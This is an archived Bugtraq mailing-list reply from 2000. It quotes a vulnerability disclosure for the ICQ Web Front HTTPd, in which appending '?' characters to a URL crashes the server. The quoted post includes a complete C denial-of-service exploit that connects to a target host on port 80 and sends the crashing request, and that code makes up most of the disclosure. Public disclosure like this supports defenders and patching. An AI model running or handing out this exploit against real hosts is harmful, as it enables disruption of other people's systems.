[17108] in bugtraq
Re: ICQ WebFront HTTPd DoS
daemon@ATHENA.MIT.EDU (Philip Stoev)
Mon Oct 9 14:25:12 2000
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <006b01c031e8$7f59a910$0100a8c0@ntserver1>
Date: Mon, 9 Oct 2000 15:00:14 +0300
Reply-To: Philip Stoev <philip@EINET.BG>
From: Philip Stoev <philip@EINET.BG>
To: BUGTRAQ@SECURITYFOCUS.COM
Nothing new under the sun.
http://www.securityfocus.com/archive/1/50363
Philip
----- Original Message -----
From: "skrilla in money order only" <chear@BEEF.TPGN.NET>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Saturday, October 07, 2000 3:51 PM
Subject: ICQ WebFront HTTPd DoS
> ICQ Web Front DoS
> -
> Exploit and Discovery By: Charles Chear [chear@beef.tpgn.net]
>
> Description:
> More current ICQ clients now offer a mini httpd for members' desktops
> called the Web Front. It seems that appending a "?" character
> (and possible other characters) to the url will cause the httpd to
> crash, if not the whole client all together. Tested on Windows 95/98.
>
> Greets:
> Colloron, Joshd, Presto, tpgn.net, and all the other gangsters.
>
> -- bite here --
>
> /* ICQ Web Front DoS */
>
> #include <sys/socket.h>
> #include <stdio.h>
> #include <netinet/in.h>
> #include <netdb.h>
>
> void main(int argc, char *argv[])
> {
> int sock;
> struct in_addr addr;
> struct sockaddr_in sin;
> struct hostent *he;
> unsigned long start;
> unsigned long end;
> unsigned long counter;
>
> /* added extra ? to be on the safe side :) */
> char xploitstr1[50]="GET /?????????? HTTP/1.0 \n\n";
>
>
> printf("ICQ Web Front DoS - author: char0hlz/tPG\n");
> printf("The Poor Gurus' Network [http://www.tpgn.net]\n");
>
> if (argc<2)
> {
> printf("usage: %s <hostname>\n", argv[0]);
> exit(0);
> }
> if ((he=gethostbyname(argv[1])) == NULL)
> {
> herror("gethostbyname");
> exit(0);
> }
> start=inet_addr(argv[1]);
> counter=ntohl(start);
> sock=socket(AF_INET,SOCK_STREAM,0);
> bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length);
> sin.sin_family=AF_INET;
> sin.sin_port=htons(80);
> if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0)
> {
> perror("pr0blemz");
> }
> send(sock,xploitstr1,strlen(xploitstr1),0);
> close(sock);
>
> printf("Done. Refresh the page to see if it worked.\n");
> }
